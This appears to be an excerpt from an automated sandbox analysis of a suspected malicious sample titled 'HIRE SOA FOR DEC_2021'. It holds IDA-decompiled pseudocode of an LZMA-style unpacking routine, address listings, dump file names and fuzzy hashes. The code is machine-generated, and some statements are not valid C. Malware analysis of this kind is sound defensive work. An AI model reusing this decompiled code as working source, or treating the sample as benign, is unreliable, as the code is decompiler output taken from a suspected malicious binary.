												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406409
0x00406409
0x0040640d
0x0040641a
0x00406424
0x00000000
0x0040640f
0x0040640f
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00406343
0x00406346
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x004066b8
0x004066b8
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00000000
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00406734
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00000000
0x0040673a
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004066bb
0x004066b8
0x00000000
0x0040640d

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406355 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406355() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
